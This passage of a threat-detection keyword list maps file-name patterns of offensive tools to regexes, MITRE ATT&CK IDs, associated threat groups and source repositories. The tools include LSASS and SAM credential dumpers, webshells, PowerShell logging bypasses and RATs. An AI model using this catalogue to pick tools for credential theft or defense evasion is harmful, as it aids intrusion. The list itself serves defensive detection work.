tool","https://github.com/Pennyw0rth/NetExec","1","0","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","18212" "*\RunAsWinTcb\*",".{0,1000}\\RunAsWinTcb\\.{0,1000}","offensive_tool_keyword","RunAsWinTcb","RunAsWinTcb uses an userland exploit to run a DLL with a protection level of WinTcb-Light.","T1073.002 - T1055.001 - T1055.002","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/tastypepperoni/RunAsWinTcb","1","0","N/A","N/A","10","2","132","17","2022-08-02T16:35:50Z","2022-07-29T16:36:06Z","18213" "*\RunBOF.exe*",".{0,1000}\\RunBOF\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","A tool to run object files mainly beacon object files (BOF) in 
.Net.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/nettitude/RunOF","1","0","N/A","N/A","10","10","145","21","2023-01-06T15:30:05Z","2022-02-21T13:53:39Z","18214" "*\runcalc.dll*",".{0,1000}\\runcalc\.dll.{0,1000}","offensive_tool_keyword","metasploit","metasploit command lines patterns","T1573.002 - T1021","TA0001 - TA0002 - TA0003","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Exploitation 
tool","https://github.com/rapid7/metasploit-framework","1","0","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","18215" "*\runcmd.lua*",".{0,1000}\\runcmd\.lua.{0,1000}","offensive_tool_keyword","OffensiveLua","Offensive Lua is a collection of offensive security scripts written in Lua with FFI","T1059 - T1218.011 - T1105 - T1021.002 - T1564.001 - T1112 - T1113 - T1204.002 - T1547.002","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0011","N/A","N/A","Exploitation tool","https://github.com/hackerhouse-opensource/OffensiveLua","1","0","N/A","N/A","8","2","184","25","2023-11-17T00:35:10Z","2023-10-25T17:21:13Z","18216" "*\runcmd2.lua*",".{0,1000}\\runcmd2\.lua.{0,1000}","offensive_tool_keyword","OffensiveLua","Offensive Lua is a collection of offensive security scripts written in Lua with FFI","T1059 - T1218.011 - T1105 - T1021.002 - T1564.001 - T1112 - T1113 - T1204.002 - T1547.002","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0011","N/A","N/A","Exploitation tool","https://github.com/hackerhouse-opensource/OffensiveLua","1","0","N/A","N/A","8","2","184","25","2023-11-17T00:35:10Z","2023-10-25T17:21:13Z","18217" "*\Running_msf_revshell*",".{0,1000}\\Running_msf_revshell.{0,1000}","offensive_tool_keyword","DarkWidow","Indirect Dynamic Syscall SSN + Syscall address sorting via Modified TartarusGate approach + Remote Process Injection via APC Early Bird + Spawns a sacrificial Process as target process + (ACG+BlockDll) mitigation policy on spawned process + PPID spoofing (Emotet method) + Api resolving from TIB + API hashing","T1055 - T1055.012 - T1055.002 - T1098 - T1027 - T1027.001 - T1070.004 - T1036 - T1134 - T1140","TA0005 - TA0003 - TA0002 - TA0004","N/A","N/A","Defense Evasion","https://github.com/reveng007/DarkWidow","1","0","N/A","N/A","10","7","671","91","2025-03-12T21:58:25Z","2023-07-24T13:59:16Z","18218" "*\RunOF.exe*",".{0,1000}\\RunOF\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","A tool to run object files 
mainly beacon object files (BOF) in .Net.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/nettitude/RunOF","1","0","N/A","N/A","10","10","145","21","2023-01-06T15:30:05Z","2022-02-21T13:53:39Z","18219" "*\RunOF\bin\*",".{0,1000}\\RunOF\\bin\\.{0,1000}","offensive_tool_keyword","cobaltstrike","A tool to run object files mainly beacon object files (BOF) in .Net.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - 
T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/nettitude/RunOF","1","0","N/A","N/A","10","10","145","21","2023-01-06T15:30:05Z","2022-02-21T13:53:39Z","18220" "*\RunPEinMemory.exe*",".{0,1000}\\RunPEinMemory\.exe.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation 
tool","https://github.com/r00t-3xp10it/redpill","1","0","N/A","N/A","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","18223" "*\RunPEinMemory64.exe*",".{0,1000}\\RunPEinMemory64\.exe.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","0","N/A","N/A","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","18224" "*\runswhide.lua*",".{0,1000}\\runswhide\.lua.{0,1000}","offensive_tool_keyword","OffensiveLua","Offensive Lua is a collection of offensive security scripts written in Lua with FFI","T1059 - T1218.011 - T1105 - T1021.002 - T1564.001 - T1112 - T1113 - T1204.002 - T1547.002","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0011","N/A","N/A","Exploitation tool","https://github.com/hackerhouse-opensource/OffensiveLua","1","0","N/A","N/A","8","2","184","25","2023-11-17T00:35:10Z","2023-10-25T17:21:13Z","18225" "*\RunWithPathAsAdmin.bat*",".{0,1000}\\RunWithPathAsAdmin\.bat.{0,1000}","offensive_tool_keyword","Invisi-Shell","Hide your powershell script in plain sight! Invisi-Shell bypasses all of Powershell security features (ScriptBlock logging. Module logging. Transcription. AMSI) by hooking .Net assemblies. 
The hook is performed via CLR Profiler API.","T1027 - T1059.001 - T1562","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/OmerYa/Invisi-Shell","1","0","N/A","N/A","10","10","1167","166","2019-08-19T19:55:19Z","2018-10-14T23:32:56Z","18226" "*\RunWithRegistryNonAdmin.bat*",".{0,1000}\\RunWithRegistryNonAdmin\.bat.{0,1000}","offensive_tool_keyword","Invisi-Shell","Hide your powershell script in plain sight! Invisi-Shell bypasses all of Powershell security features (ScriptBlock logging. Module logging. Transcription. AMSI) by hooking .Net assemblies. The hook is performed via CLR Profiler API.","T1027 - T1059.001 - T1562","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/OmerYa/Invisi-Shell","1","0","N/A","N/A","10","10","1167","166","2019-08-19T19:55:19Z","2018-10-14T23:32:56Z","18227" "*\rusthound.exe*",".{0,1000}\\rusthound\.exe.{0,1000}","offensive_tool_keyword","RustHound","Active Directory data collector for BloodHound written in Rust","T1087.002 - T1018 - T1059.003","TA0007 - TA0001 - TA0002","N/A","N/A","Discovery","https://github.com/OPENCYBER-FR/RustHound","1","0","N/A","AD Enumeration","9","10","1013","98","2024-10-21T18:58:20Z","2022-10-12T05:54:35Z","18233" "*\rustive.dmp*",".{0,1000}\\rustive\.dmp.{0,1000}","offensive_tool_keyword","RustiveDump","LSASS memory dumper using only NTAPIs","T1003.001 - T1055 - T1106","TA0006 - TA0008 - TA0011","N/A","N/A","Credential Access","https://github.com/safedv/RustiveDump","1","0","N/A","N/A","10","4","332","43","2025-03-08T12:10:35Z","2024-10-06T16:01:49Z","18234" "*\RustiveDump.bin*",".{0,1000}\\RustiveDump\.bin.{0,1000}","offensive_tool_keyword","RustiveDump","LSASS memory dumper using only NTAPIs","T1003.001 - T1055 - T1106","TA0006 - TA0008 - TA0011","N/A","N/A","Credential Access","https://github.com/safedv/RustiveDump","1","0","N/A","N/A","10","4","332","43","2025-03-08T12:10:35Z","2024-10-06T16:01:49Z","18235" 
"*\RustiveDump.exe*",".{0,1000}\\RustiveDump\.exe.{0,1000}","offensive_tool_keyword","RustiveDump","LSASS memory dumper using only NTAPIs","T1003.001 - T1055 - T1106","TA0006 - TA0008 - TA0011","N/A","N/A","Credential Access","https://github.com/safedv/RustiveDump","1","0","N/A","N/A","10","4","332","43","2025-03-08T12:10:35Z","2024-10-06T16:01:49Z","18236" "*\RustPotato-main*",".{0,1000}\\RustPotato\-main.{0,1000}","offensive_tool_keyword","RustPotato","A Rust implementation of GodPotato - abusing SeImpersonate to gain SYSTEM privileges","T1134.001 - T1055.011","TA0004","N/A","N/A","Privilege Escalation","https://github.com/emdnaia/RustPotato","1","0","N/A","N/A","10","1","0","0","2025-01-06T18:10:17Z","2025-01-06T19:44:57Z","18237" "*\RustRedOps\*",".{0,1000}\\RustRedOps\\.{0,1000}","offensive_tool_keyword","RustRedOps","RustRedOps is a repository dedicated to gathering and sharing advanced techniques and offensive malware for Red Team","T1027.002 - T1053.005 - T1204.002 - T1588.002","TA0005 - TA0002 - TA0003 - TA0042","N/A","N/A","Exploitation tool","https://github.com/joaoviictorti/RustRedOps","1","0","N/A","N/A","10","10","1548","176","2025-04-20T18:50:04Z","2023-11-29T16:07:06Z","18238" "*\RustRedOps-main*",".{0,1000}\\RustRedOps\-main.{0,1000}","offensive_tool_keyword","RustRedOps","RustRedOps is a repository dedicated to gathering and sharing advanced techniques and offensive malware for Red Team","T1027.002 - T1053.005 - T1204.002 - T1588.002","TA0005 - TA0002 - TA0003 - TA0042","N/A","N/A","Exploitation tool","https://github.com/joaoviictorti/RustRedOps","1","0","N/A","N/A","10","10","1548","176","2025-04-20T18:50:04Z","2023-11-29T16:07:06Z","18239" "*\s3aclenum.py*",".{0,1000}\\s3aclenum\.py.{0,1000}","offensive_tool_keyword","quiet-riot","Unauthenticated enumeration of AWS - Azure and GCP Principals","T1087 - T1083 - T1210","TA0007 - 
TA0001","N/A","N/A","Discovery","https://github.com/righteousgambit/quiet-riot","1","0","N/A","N/A","6","3","224","30","2024-11-13T19:41:26Z","2021-10-28T15:12:27Z","18243" "*\s3enum.py*",".{0,1000}\\s3enum\.py.{0,1000}","offensive_tool_keyword","quiet-riot","Unauthenticated enumeration of AWS - Azure and GCP Principals","T1087 - T1083 - T1210","TA0007 - TA0001","N/A","N/A","Discovery","https://github.com/righteousgambit/quiet-riot","1","0","N/A","N/A","6","3","224","30","2024-11-13T19:41:26Z","2021-10-28T15:12:27Z","18244" "*\S4U.Exe*",".{0,1000}\\S4U\.Exe.{0,1000}","offensive_tool_keyword","KRBUACBypass","UAC Bypass By Abusing Kerberos Tickets","T1548.002 - T1558 - T1558.003","TA0004 - TA0006","N/A","N/A","Defense Evasion","https://github.com/wh0amitz/KRBUACBypass","1","0","N/A","N/A","8","5","496","62","2023-08-10T02:51:59Z","2023-07-27T12:08:12Z","18245" "*\S4U.Exe*",".{0,1000}\\S4U\.Exe.{0,1000}","offensive_tool_keyword","S4UTomato","Escalate Service Account To LocalSystem via Kerberos","T1558 - T1558.002 - T1548.002 - T1078 - T1078.004","TA0006 - TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/wh0amitz/S4UTomato","1","0","N/A","N/A","10","4","394","76","2023-09-14T08:53:19Z","2023-07-30T11:51:57Z","18246" "*\S4uDelegator.*",".{0,1000}\\S4uDelegator\..{0,1000}","offensive_tool_keyword","PrivFu","perform S4U logon with SeTcbPrivilege","T1134","TA0004","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu","1","0","N/A","S4uDelegator","10","9","849","122","2025-01-21T05:22:50Z","2021-12-28T13:14:25Z","18247" "*\S4UTomato\*",".{0,1000}\\S4UTomato\\.{0,1000}","offensive_tool_keyword","S4UTomato","Escalate Service Account To LocalSystem via Kerberos","T1558 - T1558.002 - T1548.002 - T1078 - T1078.004","TA0006 - TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/wh0amitz/S4UTomato","1","0","N/A","N/A","10","4","394","76","2023-09-14T08:53:19Z","2023-07-30T11:51:57Z","18248" "*\s72 Shell v1.1 
Coding.php*",".{0,1000}\\s72\sShell\sv1\.1\sCoding\.php.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","N/A","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","18249" "*\Safe_mode_AnyDesk.txt*",".{0,1000}\\Safe_mode_AnyDesk\.txt.{0,1000}","offensive_tool_keyword","Dispossessor","notes used to install anydesk by the Dispossessor group","T1486 - T1490 - T1059 - T1213 - T1078","TA0040 - TA0043 - TA0001 - TA0009","N/A","Dispossessor","Persistence","https://vx-underground.org/Archive/Dispossessor%20Leaks","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","18250" "*\SafetyDump.csproj*",".{0,1000}\\SafetyDump\.csproj.{0,1000}","offensive_tool_keyword","SafetyDump","in memory process dumper - uses the Minidump Windows API to dump process memory before base64 encoding that dump and writing it to standard output","T1003.005 - T1059.001 - T1105 - T1071.001","TA0005 - TA0006 - TA0010","N/A","N/A","Credential Access","https://github.com/riskydissonance/SafetyDump","1","0","N/A","N/A","10","2","162","16","2020-10-29T16:25:04Z","2019-12-10T14:45:17Z","18255" "*\SafetyDump.exe*",".{0,1000}\\SafetyDump\.exe.{0,1000}","offensive_tool_keyword","SafetyDump","in memory process dumper - uses the Minidump Windows API to dump process memory before base64 encoding that dump and writing it to standard output","T1003.005 - T1059.001 - T1105 - T1071.001","TA0005 - TA0006 - TA0010","N/A","N/A","Credential Access","https://github.com/riskydissonance/SafetyDump","1","0","N/A","N/A","10","2","162","16","2020-10-29T16:25:04Z","2019-12-10T14:45:17Z","18256" "*\SafetyDump.sln*",".{0,1000}\\SafetyDump\.sln.{0,1000}","offensive_tool_keyword","SafetyDump","in memory process dumper - uses the Minidump Windows API to dump process memory before base64 encoding that dump and writing it to 
standard output","T1003.005 - T1059.001 - T1105 - T1071.001","TA0005 - TA0006 - TA0010","N/A","N/A","Credential Access","https://github.com/riskydissonance/SafetyDump","1","0","N/A","N/A","10","2","162","16","2020-10-29T16:25:04Z","2019-12-10T14:45:17Z","18257" "*\SafetyKatz*",".{0,1000}\\SafetyKatz.{0,1000}","offensive_tool_keyword","SafetyKatz","SafetyKatz is a combination of slightly modified version of @gentilkiwis Mimikatz project and @subtees .NET PE Loader. First. the MiniDumpWriteDump Win32 API call is used to create a minidump of LSASS to C:\Windows\Temp\debug.bin. Then @subtees PELoader is used to load a customized version of Mimikatz that runs sekurlsa::logonpasswords and sekurlsa::ekeys on the minidump file. removing the file after execution is complete","T1003 - T1055 - T1059 - T1574","TA0002 - TA0003 - TA0008","N/A","APT39","Credential Access","https://github.com/GhostPack/SafetyKatz","1","0","N/A","N/A","10","10","1257","247","2019-10-01T16:47:21Z","2018-07-24T17:44:15Z","18258" "*\SafetyKatz.dll*",".{0,1000}\\SafetyKatz\.dll.{0,1000}","offensive_tool_keyword","Godzilla","Webshell Manager Tool that provide request proxy, server info, RCE shell, terminal execution, memory shell, port forwarding, and MSF bind/reverse shell capabilities.","T1100 - T1018 - T1059 - T1090 - T1021 - T1205 - T1105 - T1568","TA0001 - TA0002 - TA0003 - TA0011","N/A","N/A","C2","https://github.com/BeichenDream/Godzilla","1","0","N/A","N/A","10","10","4096","551","2024-07-17T07:56:35Z","2020-08-17T17:27:56Z","18259" "*\SafetyKatz.dll*",".{0,1000}\\SafetyKatz\.dll.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","N/A","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","18260" 
"*\SafetyKatz.exe*",".{0,1000}\\SafetyKatz\.exe.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","18261" "*\SafetyKatz.exe*",".{0,1000}\\SafetyKatz\.exe.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","0","N/A","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","18262" "*\SafetyKatz.exe*",".{0,1000}\\SafetyKatz\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","18263" "*\sAINT-master.zip*",".{0,1000}\\sAINT\-master\.zip.{0,1000}","offensive_tool_keyword","saint","(s)AINT is a Spyware Generator for Windows systems written in Java","T1056.001 - T1125 - T1123 - T1113 - T1105 - T1573.001","TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","C2","https://github.com/tiagorlampert/sAINT","1","0","N/A","N/A","10","10","712","311","2020-04-03T14:34:34Z","2017-11-18T18:43:25Z","18264" "*\Sako RAT.exe*",".{0,1000}\\Sako\sRAT\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","18265" "*\SAM-*.dmp*",".{0,1000}\\SAM\-.{0,1000}\.dmp.{0,1000}","offensive_tool_keyword","quarkspwdump","Quarks PwDump is a native Win32 tool to extract credentials from Windows operating systems","T1003 - T1003.001 - T1059","TA0006","N/A","LOTUS PANDA - PowerPool - Calypso","Credential Access","https://github.com/peterdocter/quarkspwdump","1","0","N/A","N/A","9","1","12","8","2015-06-25T04:22:21Z","2015-07-14T08:18:08Z","18266" 
"*\SAM-*.dmp.LOG*",".{0,1000}\\SAM\-.{0,1000}\.dmp\.LOG.{0,1000}","offensive_tool_keyword","quarkspwdump","Dump various types of Windows credentials without injecting in any process","T1003 - T1555","TA0006","N/A","N/A","Credential Access","https://github.com/quarkslab/quarkspwdump","1","0","N/A","N/A","10","5","427","142","2023-01-13T03:45:25Z","2013-02-13T15:16:30Z","18267" "*\SAM\.Sam-Full.txt*",".{0,1000}\\SAM\\\.Sam\-Full\.txt.{0,1000}","offensive_tool_keyword","PSMapExec","A PowerShell tool heavily inspired by the popular tool CrackMapExec. Far too often I find myself on engagements without access to Linux in order to make use of CrackMapExec.","T1059.001 - T1021.006 - T1110.001 - T1021.001 - T1021.004 - T1021.005 - T1021.003 - T1621","TA0002 - TA0011 - TA0005 - TA0006 - TA0007","N/A","N/A","Exploitation tool","https://github.com/The-Viper-One/PsMapExec","1","0","N/A","N/A","10","10","954","108","2025-03-11T14:38:50Z","2023-06-20T16:57:27Z","18268" "*\samantha.txt",".{0,1000}\\samantha\.txt","offensive_tool_keyword","cobaltstrike","Dumping SAM / SECURITY / SYSTEM registry hives with a Beacon Object File","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera 
- Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/EncodeGroup/BOF-RegSave","1","0","N/A","N/A","10","10","198","32","2020-10-08T17:29:02Z","2020-10-07T13:46:03Z","18269" "*\sambaPipe.py*",".{0,1000}\\sambaPipe\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","0","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","18270" "*\sampasswd.*",".{0,1000}\\sampasswd\..{0,1000}","offensive_tool_keyword","chntpw","reset a password on your system","T1003 - T1078","TA0006","N/A","N/A","Credential Access","https://pogostick.net/~pnh/ntpasswd/chntpw-source-140201.zip","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","18271" 
